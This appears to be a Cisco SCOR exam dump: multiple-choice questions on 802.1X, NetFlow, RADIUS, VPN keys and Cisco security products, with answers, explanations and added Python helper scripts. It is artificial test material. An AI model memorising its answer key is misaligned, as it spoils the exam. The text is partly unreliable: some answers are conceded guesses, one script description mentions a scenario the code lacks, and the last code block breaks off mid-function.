What will occur when this device tries to connect to the port?

A. 802.1X will not work, but MAB will start and allow the device on the network
B. 802.1X will not work and the device will not be allowed network access
C. 802.1X will work and the device will be allowed on the network
D. 802.1X and MAB will both be used and ISE can use policy to determine the access level

Answer: C

Explanation

The exhibit contains no mab command, so MAC Authentication Bypass (MAB) is not enabled on the interface
-> Answers A and D are not correct.

Two commands enable 802.1X on a port:

+ access-session port-control auto: enables 802.1X port-based authentication on the interface (older IOS
releases use authentication port-control auto)
+ dot1x pae authenticator: sets the Port Access Entity (PAE) type. With the authenticator keyword the
interface acts only as an authenticator and does not respond to messages meant for a supplicant.

Both commands are present, so 802.1X will work on the interface.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_8021x/configuration/xe-
3se/3850/sec-user-8021x-xe-3se-3850-book/config-ieee-802x-pba.html

The other commands are explained below:

+ authentication periodic: enables re-authentication on the interface
+ authentication host-mode multi-auth: allows one voice device and multiple data endpoints on the same
physical access port, each authenticated separately
+ dot1x timeout tx-period 10: sets the interval between EAP-Request/Identity retransmissions to 10 seconds
+ device-tracking attach-policy {policy-name}: applies the IP device tracking (IPDT) policy to the switchport.
Its main task is to keep track of connected hosts (the association of MAC and IP address), which features
such as downloadable ACLs depend on
+ snmp trap mac-notification change added / snmp trap mac-notification change removed: send an SNMP
trap when a MAC address is added to or removed from the interface

Question 67

An engineer is configuring their router to send NetFlow data to Stealthwatch which has an IP address of
1.1.1.1 using the flow record Steathwatch406397954 command. Which additional command is
required to complete the flow record?

A. transport udp 2055
B. match ipv4 ttl
C. cache timeout active 60
D. destination 1.1.1.1

Answer: B

Explanation

The “transport udp …” command can only be used under flow exporter, and so can “destination 1.1.1.1”,
which names the collector. The “cache timeout active …” command can only be used under flow monitor,
which ties a record to an exporter and applies the cache timers.

A flow record holds only match (key) and collect (non-key) fields, so “match ipv4 ttl” is the only option
that is valid under flow record in this question. A usable record for Stealthwatch also needs key fields
such as the source and destination addresses, ports and protocol.

Good reference: https://www.cisco.com/c/dam/en/us/td/docs/security/stealthwatch/netflow/config-
trouble-netflow-stealth.pdf
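Question 67 turns on which Flexible NetFlow section accepts which command. The Python below is an added example, not code from the page or from Cisco: it builds the complete record/exporter/monitor trio that Stealthwatch expects and refuses to place a command under the wrong section. The section names, the collector 1.1.1.1 (the address from the question), the source interface and the monitored interface are assumptions.

```python
"""Flexible NetFlow for Stealthwatch: build the record, exporter and monitor,
and check that every command sits in the section that accepts it.

Added example, not from the original page or from Cisco. The field set
follows Cisco's Stealthwatch NetFlow guidance; the section names, the
collector 1.1.1.1, the source interface and the monitored interface are
assumptions chosen to match Question 67.
"""
from __future__ import annotations

# First keyword of a command -> the FNF section that accepts it (Question 67).
SECTION_OF = {
    "match": "flow record", "collect": "flow record",
    "destination": "flow exporter", "source": "flow exporter",
    "transport": "flow exporter", "template": "flow exporter",
    "option": "flow exporter",
    "record": "flow monitor", "exporter": "flow monitor", "cache": "flow monitor",
}


def section_for(command: str) -> str:
    """Return the FNF section a command belongs under, or raise ValueError."""
    keyword = command.split()[0]
    if keyword not in SECTION_OF:
        raise ValueError(f"unknown Flexible NetFlow command: {command!r}")
    return SECTION_OF[keyword]


def validate_sections(cfg: dict[str, list[str]]) -> None:
    """Raise ValueError if any command is placed under the wrong section."""
    for header, cmds in cfg.items():
        if header.startswith("interface"):
            continue
        section = header.rsplit(" ", 1)[0]   # "flow exporter SW" -> "flow exporter"
        for cmd in cmds:
            if section_for(cmd) != section:
                raise ValueError(f"{cmd!r} is not accepted under {header!r}")


def build_fnf_config(collector_ip: str, name: str = "Stealthwatch",
                     source_if: str = "Loopback0",
                     monitored_if: str = "GigabitEthernet0/0") -> dict[str, list[str]]:
    """Return {section header: [commands]} for a Stealthwatch-style export."""
    record = [   # match = key fields that identify a flow; collect = exported extras
        "match ipv4 protocol", "match ipv4 source address",
        "match ipv4 destination address", "match transport source-port",
        "match transport destination-port", "match interface input", "match ipv4 tos",
        "collect interface output", "collect counter bytes", "collect counter packets",
        "collect timestamp sys-uptime first", "collect timestamp sys-uptime last",
    ]
    exporter = [
        f"destination {collector_ip}", f"source {source_if}",
        "transport udp 2055",            # Stealthwatch Flow Collector default port
        "template data timeout 30",
        "option interface-table", "option application-table",
    ]
    monitor = [
        f"record {name}", f"exporter {name}",
        "cache timeout active 60",       # report long-lived flows every 60 s
        "cache timeout inactive 15",
    ]
    cfg = {
        f"flow record {name}": record,
        f"flow exporter {name}": exporter,
        f"flow monitor {name}": monitor,
        f"interface {monitored_if}": [f"ip flow monitor {name} input"],
    }
    validate_sections(cfg)
    return cfg


def render(cfg: dict[str, list[str]]) -> str:
    """Render the sections as IOS CLI text, in the order IOS needs them."""
    out: list[str] = []
    for header, cmds in cfg.items():
        out.append(header)
        out.extend(f" {c}" for c in cmds)
        out.append("!")
    return "\n".join(out)


if __name__ == "__main__":
    print(render(build_fnf_config("1.1.1.1")))
```

Running the script prints the four sections in the order IOS accepts them (record, exporter, monitor, then the interface that applies the monitor); passing a dictionary with a misplaced command such as "destination 1.1.1.1" under a flow record raises a ValueError, which is the mistake the question is built around.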

Question 68

An engineer needs to add protection for data in transit and have headers in the email message. Which
configuration is needed to accomplish this goal?

A. Provision the email appliance
B. Deploy an encryption appliance
C. Map sender IP addresses to a host interface
D. Enable flagged message handling

Answer: B

Question 69

An administrator is adding a new switch onto the network and has configured AAA for network access
control. When testing the configuration, the RADIUS authenticates to Cisco ISE but is being rejected. Why
is the ip radius source-interface command needed for this configuration?

A. Only requests that originate from a configured NAS IP are accepted by a RADIUS server
B. The RADIUS authentication key is transmitted only from the defined RADIUS source interface
C. RADIUS requests are generated only by a router if a RADIUS source interface is defined
D. Encrypted RADIUS authentication requires the RADIUS source interface be defined

Answer: A

Explanation

The source IP address of the RADIUS packets must match the network access device (NAS) IP address
configured on the RADIUS server, which for ISE is the address in the network device entry. By default the
switch sources RADIUS traffic from whichever interface the routing table picks, so ip radius source-interface
<interface> pins it to a fixed address (ideally a loopback) that ISE knows. On a mismatch ISE drops the
request as coming from an unknown NAS, the switch sees a RADIUS packet timeout and the server gets
marked “DEAD”.

Reference: https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-
networking-services/whitepaper_C11-731907.html

Question 70

Refer to the exhibit.

interface GigabitEthernet1/0/18
switchport access vlan 41
switchport mode access
switchport voice vlan 44
device-tracking attach-policy IPDT_MAX_10
authentication periodic
authentication timer reauthenticate server
access-session host-mode multi-domain
access-session port-control auto
dot1x pae authenticator
dot1x timeout tx-period 7
dot1x max-reauth-req 3
spanning-tree portfast
service-policy type control subscriber POLICY_Gi1/0/18

A Cisco ISE administrator adds a new switch to an 802.1X deployment and has difficulty with some
endpoints gaining access. Most PCs and IP phones can connect and authenticate using their machine
certificate credentials. However, printers and video cameras cannot, based on the interface configuration
provided. What must be done to get these devices onto the network using Cisco ISE for authentication and
authorization while maintaining security controls?

A. Change the default policy in Cisco ISE to allow all devices not using machine authentication
B. Enable insecure protocols within Cisco ISE in the allowed protocols configuration
C. Configure authentication event fail retry 2 action authorize vlan 41 on the interface
D. Add mab to the interface configuration

Answer: D

Explanation

The interface runs 802.1X only (access-session port-control auto plus dot1x pae authenticator) and has no
mab command, so endpoints without an 802.1X supplicant, such as printers and cameras, have no way to
authenticate and are denied. Adding mab to the interface lets the switch send the endpoint’s MAC address
to ISE as a RADIUS credential once 802.1X times out (or first, with authentication order mab dot1x), so ISE
still applies a per-device authorization policy. Answer A would admit every device that cannot do machine
authentication, which defeats the requirement to maintain security controls; answer C only places failed
endpoints into a local fallback VLAN without any ISE authorization.
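The two 802.1X exhibits (Questions 66 and 70) come down to reading an interface block: port-control auto plus dot1x pae authenticator give you 802.1X, and mab is what lets supplicant-less devices in. The Python script below is an added example, not code from the exam or from Cisco: it parses a running-config and reports the outcome per port. The three interface blocks in SAMPLE_CONFIG are constructed for the example; the first copies the Question 70 exhibit.

```python
"""Audit IOS interface blocks for 802.1X / MAB readiness.

Added example, not from the original page or from Cisco. It encodes the
reasoning used in Questions 66 and 70: 802.1X needs 'access-session
port-control auto' (or 'authentication port-control auto' on older IOS)
plus 'dot1x pae authenticator'; endpoints with no supplicant (printers,
cameras) can only get on through 'mab'. SAMPLE_CONFIG is constructed for
the example; the first interface copies the Question 70 exhibit.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SAMPLE_CONFIG = """\
interface GigabitEthernet1/0/18
 switchport access vlan 41
 switchport mode access
 switchport voice vlan 44
 device-tracking attach-policy IPDT_MAX_10
 authentication periodic
 authentication timer reauthenticate server
 access-session host-mode multi-domain
 access-session port-control auto
 dot1x pae authenticator
 dot1x timeout tx-period 7
 dot1x max-reauth-req 3
 spanning-tree portfast
!
interface GigabitEthernet1/0/19
 switchport access vlan 41
 switchport mode access
 access-session host-mode multi-auth
 access-session port-control auto
 dot1x pae authenticator
 mab
!
interface GigabitEthernet1/0/20
 switchport access vlan 41
 switchport mode access
 dot1x pae authenticator
!
"""


@dataclass
class PortAuth:
    name: str
    port_control_auto: bool = False
    dot1x_authenticator: bool = False
    mab: bool = False
    host_mode: str = "single-host"   # IOS default when no host-mode is set

    @property
    def dot1x_works(self) -> bool:
        return self.port_control_auto and self.dot1x_authenticator

    @property
    def mab_works(self) -> bool:
        return self.port_control_auto and self.mab

    def outcome_for(self, has_supplicant: bool) -> str:
        """Describe what happens when an endpoint connects to this port."""
        if not self.port_control_auto:
            return "no access control: port is force-authorized (open)"
        if has_supplicant and self.dot1x_works:
            return "802.1X authenticates the endpoint"
        if self.mab_works:
            return "802.1X absent or timed out; MAB authenticates the MAC address"
        return "no 802.1X/MAB method applies: endpoint is denied network access"

    def missing_for_mab(self) -> list[str]:
        """Commands to add so supplicant-less devices can authenticate via ISE."""
        needed = []
        if not self.port_control_auto:
            needed.append("access-session port-control auto")
        if not self.mab:
            needed.append("mab")
        return needed


def parse_interfaces(config: str) -> dict[str, PortAuth]:
    """Split a running-config into per-interface PortAuth records."""
    ports: dict[str, PortAuth] = {}
    current: PortAuth | None = None
    for raw in config.splitlines():
        m = re.match(r"^interface (\S+)", raw)
        if m:
            current = PortAuth(m.group(1))
            ports[current.name] = current
            continue
        if not raw.startswith(" "):      # '!' or a global command ends the block
            current = None
            continue
        if current is None:
            continue
        cmd = raw.strip()
        if cmd in ("access-session port-control auto", "authentication port-control auto"):
            current.port_control_auto = True
        elif cmd in ("dot1x pae authenticator", "dot1x pae both"):
            current.dot1x_authenticator = True
        elif cmd == "mab":
            current.mab = True
        else:
            hm = re.match(r"^(?:access-session|authentication) host-mode (\S+)", cmd)
            if hm:
                current.host_mode = hm.group(1)
    return ports


if __name__ == "__main__":
    for port in parse_interfaces(SAMPLE_CONFIG).values():
        print(f"{port.name} ({port.host_mode}):")
        print("  PC with supplicant   :", port.outcome_for(has_supplicant=True))
        print("  printer, no supplicant:", port.outcome_for(has_supplicant=False))
        if port.missing_for_mab():
            print("  add:", ", ".join(port.missing_for_mab()))
```

For the Question 70 interface the script reports that a PC authenticates with 802.1X while a printer is denied, and that the single missing command is mab; the third interface has dot1x pae authenticator but no port-control auto, so it is effectively open, which is the opposite failure mode and worth catching in the same audit.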

Question 71

What is the function of the crypto isakmp key cisc406397954 address 0.0.0.0 0.0.0.0 command
when establishing an IPsec VPN tunnel?

A. It defines what data is going to be encrypted via the VPN
B. It configures the pre-shared authentication key
C. It prevents all IP addresses from connecting to the VPN server.
D. It configures the local address for the VPN server.

Answer: B

Explanation

Note:
+ “address 0.0.0.0 0.0.0.0” means the remote peer is any: every peer that presents this key can negotiate
IKE Phase 1 with this router.
+ The Phase 1 pre-shared key is “cisc406397954”.
+ A wildcard pre-shared key has to be shared with every peer, so one compromised peer exposes all of
them. Where the peer address is known, use a per-peer address (or certificate authentication) instead.

Question 72

An engineer is adding a Cisco DUO solution to the current TACACS+ deployment using Cisco ISE. The
engineer wants to authenticate users using their account when they log into network devices. Which action
accomplishes this task?

A. Configure Cisco DUO with the external Active Directory connector and tie it to the policy set within Cisco
ISE
B. Install and configure the Cisco DUO Authentication Proxy and configure the identity source sequence
within Cisco ISE
C. Create an identity policy within Cisco ISE to send all authentication requests to Cisco DUO
D. Modify the current policy with the condition MFASourceSequence DUO=true in the authorization
conditions within Cisco ISE

Answer: B

Explanation

Duo MFA Integration with ISE for TACACS+ Device Administration with Local/Internal (ISE) Users

In this setup, ISE forwards the TACACS+ authentication requests to the Duo Authentication Proxy. The
proxy then punts the requests back to ISE for local user authentication. This can be a little confusing, but
it is necessary for organizations that want to use the local user database on ISE and not rely on external
identity sources such as Active Directory or LDAP. If the authentication is successful, the end user/admin is
sent a “Duo Push”. If the local ISE authentication fails, the process stops and no “Duo Push” occurs.

1. Admin user initiates a shell connection to a network device where he/she uses Active Directory based
credentials
2. Network device forwards the request to the TACACS+ server (ISE)
3. ISE sends the authentication request to Duo’s Authentication Proxy
4. The proxy forwards the request back to ISE for the 1st factor authentication
5. ISE informs the Authentication Proxy if the local authentication was successful
6. Upon successful ISE authentication, the Authentication Proxy sends an authentication request to Duo
cloud for 2nd factor authentication
7. Duo cloud sends a “push” to the admin user
8. Admin user “approves” the “push”
9. Duo informs the Authentication Proxy of the successful push
10. Authentication proxy informs ISE of a successful Authentication
11. ISE Authorizes the admin user

Also according to this Cisco link, we need to configure an “Identity Source Sequence” in Cisco ISE.

Therefore answer B is the best choice.

Question 73

An organization is selecting a cloud architecture and does not want to be responsible for patch
management of the operating systems. Why should the organization select either Platform as a Service or
Infrastructure as a Service for this environment?

A. Platform as a Service because the customer manages the operating system
B. Infrastructure as a Service because the customer manages the operating system
C. Platform as a Service because the service provider manages the operating system
D. Infrastructure as a Service because the service provider manages the operating system

Answer: C

Explanation

We don’t want to manage the OS so we should choose PaaS or SaaS. But this question only wants to
compare between PaaS and IaaS so we must choose PaaS.

Question 74

How does a cloud access security broker function?

A. It is an authentication broker to enable single sign-on and multi-factor authentication for a cloud
solution
B. It integrates with other cloud solutions via APIs and monitors and creates incidents based on events
from the cloud solution
C. It acts as a security information and event management solution and receives syslog from other cloud
solutions
D. It scans other cloud solutions being used within the network and identifies vulnerabilities

Answer: B

Question 75

A Cisco AMP for Endpoints administrator configures a custom detection policy to add specific MD5
signatures. The configuration is created in the simple detection policy section, but it does not work. What
is the reason for this failure?

A. The administrator must upload the file instead of the hash for Cisco AMP to use
B. The MD5 hash uploaded to the simple detection policy is in the incorrect format
C. The APK must be uploaded for the application that the detection is intended
D. Detections for MD5 signatures must be configured in the advanced custom detection policies

Answer: D

Question 76

What is the difference between a vulnerability and an exploit?

A. A vulnerability is a hypothetical event for an attacker to exploit
B. A vulnerability is a weakness that can be exploited by an attacker
C. An exploit is a weakness that can cause a vulnerability in the network
D. An exploit is a hypothetical event that causes a vulnerability in the network

Answer: B

Explanation

A vulnerability is a weakness in a software system. And an exploit is an attack that leverages that
vulnerability.

Question 77

Which feature is leveraged by advanced antimalware capabilities to be an effective endpoint protection
platform?

A. big data
B. storm centers
C. sandboxing
D. blocklisting

Answer: C

Question 78

Which system facilitates deploying microsegmentation and multi-tenancy services with a policy-based
container?

A. SDLC
B. Docker
C. Lambda
D. Contiv

Answer: D

Explanation

Contiv is an open source project that allows you to deploy micro-segmentation policy-based services in
container environments. It offers a higher level of networking abstraction for microservices by providing a
policy framework. Contiv has built-in service discovery and service routing functions to allow you to scale
out services.

Reference: https://www.ciscopress.com/articles/article.asp?p=3004581&seqNum=2

Question 79

An engineer integrates Cisco FMC and Cisco ISE using pxGrid. Which role is assigned for Cisco FMC?

A. client
B. server
C. publisher
D. controller

Answer: C

Explanation

pxGrid stands for Platform Exchange Grid, and it is a technology that allows integrating multiple vendors
security products together and grouping them in an ecosystem domain. The main purpose of using pxGrid
is to share contextual data between the integrated partners.

pxGrid uses a built-in API in ISE and is made up of three main components: the controller, the publisher
and the subscriber. The controller is the core component that makes everything work and, as said, is ISE.
The publisher is the partner that has contextual data to share with the other partners. The subscriber is the
partner interested in consuming contextual data from the other partners.

Reference: https://bluenetsec.com/fmc-pxgrid-integration-with-ise/

In fact, according to figure 6-5 of this link
https://www.ciscopress.com/articles/article.asp?p=2963461&seqNum=2, FMC is a subscriber, but we have
no such option so the best answer here is “publisher”.

Question 80

A network security engineer must export packet captures from the Cisco FMC web browser while
troubleshooting an issue. When navigating to the address https://<FMC IP>/capture/CAPI/pcap/test.pcap,
an error 403: Forbidden is given instead of the PCAP file. Which action must the engineer take to resolve
this issue?

A. Disable the proxy setting on the browser
B. Disable the HTTPS server and use HTTP instead
C. Use the Cisco FTD IP address as the proxy server setting on the browser
D. Enable the HTTPS server for the device platform policy

Answer: D

Explanation

The URL downloads a capture from the managed device’s own web server, and the 403 Forbidden comes from
that server, not from a web proxy. On Cisco FTD the capture download over HTTPS only works when the
HTTPS server is enabled in the Platform Settings policy deployed to the device (Devices > Platform
Settings > HTTP) and the client’s address is in that policy’s list of permitted hosts. Switching to plain
HTTP or pointing the browser at the FTD as a proxy does not help.

The Broadcom article at https://knowledge.broadcom.com/external/article/167567/why-do-my-pcaps-show-
an-http-response-fr.html describes a different situation (a proxy denying a client request by policy, visible
in a packet capture) and does not apply to this case.

Question 81

Which security solution protects users leveraging DNS-layer security?



A. Cisco Umbrella
B. Cisco ISE
C. Cisco ASA
D. Cisco FTD

Answer: A

Question 82

What is the result of the

ACME-Router(config)#login block-for 100 attempts 4 within 60

command on a Cisco IOS router?

A. After four unsuccessful log in attempts, the line is blocked for 100 seconds and only permit IP addresses
A are permitted in ACL 60
B. After four unsuccessful log in attempts, the line is blocked for 60 seconds and only permit IP addresses
C are permitted in ACL 100
C. If four log in attempts fail in 100 seconds, wait for 60 seconds to next log in prompt
D. If four failures occur in 60 seconds, the router goes to quiet mode for 100 seconds

Answer: D

Explanation

The following example shows how to configure your router to enter a 100 second quiet period if 15 failed
login attempts is exceeded within 100 seconds; all login requests will be denied during the quiet period
except hosts from the ACL “myacl.”

Router(config)# login block-for 100 attempts 15 within 100
Router(config)# login quiet-mode access-class myacl

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_cfg/configuration/xe-16/sec-usr-
cfg-xe-16-book/sec-login-enhance.html
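The quiet-mode behaviour from Question 82 is easy to get wrong (which number is the block period and which the watch window). The Python class below is an added example, not code from the page or from Cisco: it models login block-for as a sliding window over failed logins, so four failures within 60 seconds start a 100-second quiet period during which only hosts in the quiet-mode access-class get a login prompt. The host addresses and timestamps are constructed for the example.

```python
"""Model of IOS 'login block-for <seconds> attempts <n> within <window>'.

Added example, not from the page or from Cisco. It reproduces what the
command describes: if n login failures occur within the watch window, the
device enters quiet mode for the block period and rejects every login except
from hosts matched by 'login quiet-mode access-class'. Times are seconds.
"""
from __future__ import annotations

from collections import deque


class LoginBlock:
    def __init__(self, block_for: int, attempts: int, within: int,
                 quiet_mode_acl: frozenset[str] = frozenset()):
        self.block_for = block_for            # quiet-mode duration
        self.attempts = attempts              # failures that trigger quiet mode
        self.within = within                  # watch window for those failures
        self.quiet_mode_acl = quiet_mode_acl  # hosts exempt from quiet mode
        self._failures: deque[float] = deque()
        self.quiet_until: float | None = None

    def in_quiet_mode(self, now: float) -> bool:
        """True while the quiet period is still running at time `now`."""
        if self.quiet_until is not None and now < self.quiet_until:
            return True
        self.quiet_until = None               # period expired: back to watch mode
        return False

    def login_permitted(self, now: float, src: str) -> bool:
        """Is a login prompt offered at time `now` to host `src`?"""
        return not self.in_quiet_mode(now) or src in self.quiet_mode_acl

    def record_failure(self, now: float) -> bool:
        """Register a failed login; return True if this one triggered quiet mode."""
        if self.in_quiet_mode(now):
            return False                      # prompts are refused anyway
        self._failures.append(now)
        while self._failures and now - self._failures[0] > self.within:
            self._failures.popleft()          # forget failures outside the window
        if len(self._failures) >= self.attempts:
            self.quiet_until = now + self.block_for
            self._failures.clear()
            return True
        return False


if __name__ == "__main__":
    # login block-for 100 attempts 4 within 60, with 10.0.0.5 in the quiet-mode ACL
    guard = LoginBlock(100, 4, 60, frozenset({"10.0.0.5"}))
    for t in (0, 10, 20, 30):
        print(f"t={t:3}: failure, quiet mode triggered = {guard.record_failure(t)}")
    for host in ("203.0.113.9", "10.0.0.5"):
        print(f"t= 50: prompt for {host} = {guard.login_permitted(50, host)}")
    print(f"t=131: prompt for 203.0.113.9 = {guard.login_permitted(131, '203.0.113.9')}")
```

The second scenario in the test (four failures spaced 25 seconds apart) shows why the within value matters: only three of them fall inside any 60-second window, so the router never enters quiet mode.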

Question 83

What is an advantage of network telemetry over SNMP pulls?

A. scalability
B. security
C. encapsulation
D. accuracy

Answer: A

Explanation

SNMP uses the pull model when retrieving data from a switch. This model cannot scale for today’s high-
density platforms, and offers very limited extensibility. The pull model is based on a client sending a
request to the switch, then the switch responds to that request. On average, network operators using
SNMP poll data every five to thirty minutes. But with today’s speeds and scale that’s not enough to
capture important network events.

These traditional models also impose limits like scale and efficiency -> So we can deduce network
telemetry is more scalable than SNMP pulls.

Reference: https://blogs.cisco.com/developer/its-time-to-move-away-from-snmp-and-cli-and-use-model-
driven-telemetry

Question 84

What is a benefit of using a multifactor authentication strategy?

A. It provides secure remote access for applications
B. It provides an easy, single sign-on experience against multiple applications
C. It protects data by enabling the use of a second validation of identity
D. It provides visibility into devices to establish device trust

Answer: C

Explanation

Multi-factor Authentication (MFA) is an authentication method that requires the user to provide two or
more verification factors to gain access to a resource. MFA requires means of verification that
unauthorized users won’t have.

Note: Single sign-on (SSO) is a property of identity and access management that enables users to
securely authenticate with multiple applications and websites by logging in only once with just one set of
credentials (username and password). With SSO, the application or website that the user is trying to
access relies on a trusted third party to verify that users are who they say they are.

Question 85

An engineer is trying to decide between using L2TP or GRE over IPsec for their site-to-site VPN
implementation. What must be understood before choosing a solution?

A. L2TP uses TCP port 47 and GRE over IPsec uses UDP port 1701.
B. GRE over IPsec cannot be used as a standalone protocol, and L2TP can.
C. GRE over IPsec adds its own header, and L2TP does not
D. L2TP is an IP packet encapsulation protocol, and GRE over IPsec is a tunneling protocol.

Answer: C

Explanation

L2TP uses UDP port 1701 while GRE is IP protocol 47 (not a TCP port) -> Answer A is not correct.

L2TP is the Layer 2 Tunneling Protocol, while GRE is a simple IP packet encapsulation protocol; answer D has
the two reversed -> Answer D is not correct.

This O’Reilly text says: “It is unlikely that you will set up L2TP as a standalone protocol, as it has no
authentication and encryption on its own. The more likely scenario is setting up an L2TP/IPsec tunnel”. So
L2TP can be set up as a standalone protocol, but should not be -> Answer B is not correct.

The CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide says “the GRE protocol adds its own
header (4 bytes plus options) between the payload (data) and the delivery header”, while the entire L2TP
packet, including payload and L2TP header, is sent within a User Datagram Protocol (UDP) datagram
-> Answer C is correct.

Question 86

What are two functionalities of northbound and southbound APIs within Cisco SDN architecture? (Choose
two.)

A. Southbound APIs are used to define how SDN controllers integrate with applications.
B. Northbound interfaces utilize OpenFlow and OpFlex to integrate with network devices.
C. Northbound APIs utilize RESTful API methods such as GET, POST, and DELETE.
D. Southbound interfaces utilize device configurations such as VLANs and IP addresses.
E. Southbound APIs utilize CLI, SNMP, and RESTCONF.

Answer: C E

Explanation

Northbound APIs are used to define how SDN controllers integrate with applications -> Answer A is not
correct.

OpenFlow and OpFlex are Southbound APIs -> Answer B is not correct.

Southbound APIs utilize NETCONF, RESTCONF, SNMP, Telnet, SSH… to talk to the devices; VLANs and IP
addresses are device configuration that those APIs carry, not an interface in themselves -> Answer D is not
correct while answer E is correct.

Question 87

Which two solutions help combat social engineering and phishing at the endpoint level? (Choose two)

A. Cisco ISE
B. Cisco Umbrella
C. Cisco DNA Center
D. Cisco TrustSec
E. Cisco Duo Security

Answer: B E

Question 88

A network engineer must migrate a Cisco WSA virtual appliance from one physical host to another physical
host by using VMware vMotion. What is a requirement for both physical hosts?

A. The hosts must run different versions of Cisco AsyncOS
B. The hosts must run Cisco AsyncOS 10.0 or greater
C. The hosts must have access to the same defined network
D. The hosts must use a different datastore than the virtual appliance

Answer: C

Explanation

Requirements:
+ Both physical hosts must have the same network configuration.
+ Both physical hosts must have access to the same defined network(s) to which the interfaces on the
virtual appliance are mapped.
+ Both physical hosts must have access to the datastore that the virtual appliance uses. This datastore
can be a storage area network (SAN) or Network-attached storage (NAS).
+ The Cisco Secure Email Virtual Gateway must have no mail in its queue.

Reference: https://www.cisco.com/c/dam/en/us/td/docs/security/content_security/virtual_appliances/Cisc
o_Content_Security_Virtual_Appliance_Install_Guide.pdf

Question 89

An engineer is implementing Cisco CES in an existing Microsoft Office 365 environment and must route
inbound email to Cisco CES addresses. Which DNS record must be modified to accomplish this task?

A. CNAME
B. MX
C. DKIM
D. SPF

Answer: B

Explanation

In order to route inbound email to Cisco CES addresses we must change the MX record.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2020/pdf/BRKSEC-3433.pdf

At this point, you are ready to cut over the domain through a Mail Exchange (MX) record change. Work
with your DNS administrator to resolve your MX records to the IP addresses for your Cisco Secure Email
Cloud instance as provided in your Cisco Secure Email welcome letter.

Reference: https://www.cisco.com/c/en/us/support/docs/security/cloud-email-security/214812-
configuring-office-365-microsoft-with.html

Question 90

Which method of attack is used by a hacker to send malicious code through a web application to an
unsuspecting user to request that the victims web browser executes the code?

A. buffer overflow
B. SQL injection
C. browser WGET
D. cross-site scripting

Answer: D

Question 91

What are two ways a network administrator transparently identifies users using Active Directory on the
Cisco WSA? (Choose two)

A. Create an LDAP authentication realm and disable transparent user identification
B. Deploy a separate eDirectory server, the client IP address is recorded in this server.
C. Create NTLM or Kerberos authentication realm and enable transparent user identification.
D. The eDirectory client must be installed on each client workstation
E. Deploy a separate Active Directory agent such as Cisco Context Directory Agent.

Answer: C E

Explanation

Consider the following when you identify users transparently using Active Directory:
+ Transparent user identification with Active Directory works with an NTLM or Kerberos authentication
scheme only. You cannot use it with an LDAP authentication realm that corresponds to an Active Directory
instance.
+ Transparent user identification works with the versions of Active Directory supported by an Active
Directory agent.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 92

Which endpoint solution protects a user from a phishing attack?

A. Cisco AnyConnect with Umbrella Roaming Security module
B. Cisco AnyConnect with Network Access Manager module
C. Cisco Identity Services Engine
D. Cisco AnyConnect with ISE Posture module

Answer: A

Explanation

Umbrella Roaming is a cloud-delivered security service for Cisco’s next-generation firewall. It protects your
employees even when they are off the VPN. No additional agents are required. Simply enable the Umbrella
functionality in the Cisco AnyConnect client. You’ll get seamless protection against malware, phishing, and
command-and-control callbacks wherever your users go.

Reference: https://www.cisco.com/c/en/us/products/security/umbrella/umbrella-roaming.html

Question 93

An engineer is configuring Cisco Umbrella and has an identity that references two different policies. Which
action ensures that the policy that the identity must use takes precedence over the second one?

A. Configure only the policy with the most recently changed timestamp.
B. Make the correct policy first in the policy order.
C. Configure the default policy to redirect the requests to the correct policy.
D. Place the policy with the most-specific configuration last in the policy order.

Answer: B

Question 94

Refer to the exhibit.



Which configuration item makes it possible to have the AAA session on the network?

A. aaa authorization network default group ise
B. aaa authorization exec default ise
C. aaa authentication login console ise
D. aaa authentication enable default enable

Answer: A

Explanation

+ The exhibit in this question shows a successful MAB authorization for the MAC address (the line
“Status: Authorized” and the last line “mab Authc Success”), so we need the keyword “authorization” in our
AAA command.

+ The authorized device is a Microsoft workstation gaining network access, so we need the keyword
“network” in our AAA command (“exec” and “login” apply to device administration sessions).

-> The command “aaa authorization network default group ise” is the correct answer. This command
configures network authorization through the ISE server group.

Question 95

Refer to the exhibit.



What is the function of the Python script code snippet for the Cisco ASA REST API?

A. deletes a global rule from policies
B. obtains the saved configuration of the Cisco ASA firewall
C. changes the hostname of the Cisco ASA
D. adds a global rule into policies

Answer: D

Explanation

Reference: https://github.com/timwukp/Cisco-ASA-REST-
API/blob/master/POST__api_access_global_rules_input_loop.py
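The exhibit for Question 95 is not reproduced here, but the referenced script builds a JSON rule and POSTs it to the ASA REST API’s global access rule collection. The Python below is an added example, not the exhibit’s script and not Cisco’s code, showing that exchange end to end. The endpoint path /api/access/global/rules is the one the referenced file name points at; the object “kind” values follow the ASA REST API data model as recalled from its documentation and should be treated as assumptions, as should the ASA address, credentials and rule values. Only build_global_rule runs offline; asa_request needs a reachable ASA with the REST agent installed.

```python
"""Add (or remove) a global access rule through the Cisco ASA REST API.

Added example, not the exhibit's script and not Cisco's code. Endpoint:
POST /api/access/global/rules (DELETE .../rules/<objectId> removes one).
The "kind" values are assumptions from the ASA REST API data model; the
ASA address, credentials and rule values are placeholders.
"""
from __future__ import annotations

import base64
import json
import os
import ssl
import urllib.request

ASA_HOST = os.environ.get("ASA_HOST", "192.0.2.1")   # placeholder address
GLOBAL_RULES = "/api/access/global/rules"


def build_global_rule(src: str, dst: str, port: str, permit: bool,
                      remark: str = "", position: int | None = None) -> dict:
    """Build the JSON body for one global access rule.

    src/dst: 'any', a host address or a CIDR network; port: e.g. 'tcp/443'.
    """
    def addr(value: str) -> dict:
        if value == "any":
            return {"kind": "AnyIPAddress", "value": "any4"}   # assumption: API's 'any' form
        if "/" in value:
            return {"kind": "IPv4Network", "value": value}
        return {"kind": "IPv4Address", "value": value}

    rule = {
        "sourceAddress": addr(src),
        "destinationAddress": addr(dst),
        "sourceService": {"kind": "NetworkProtocol", "value": port.split("/")[0]},
        "destinationService": {"kind": "TcpUdpService", "value": port},
        "permit": permit,
        "active": True,
        "ruleLogging": {"logStatus": "Default", "logInterval": 300},
    }
    if remark:
        rule["remarks"] = [remark]
    if position is not None:          # 1-based position in the global ACL
        rule["position"] = position
    return rule


def asa_request(method: str, path: str, body: dict | None = None,
                user: str = "", password: str = "", verify_tls: bool = True):
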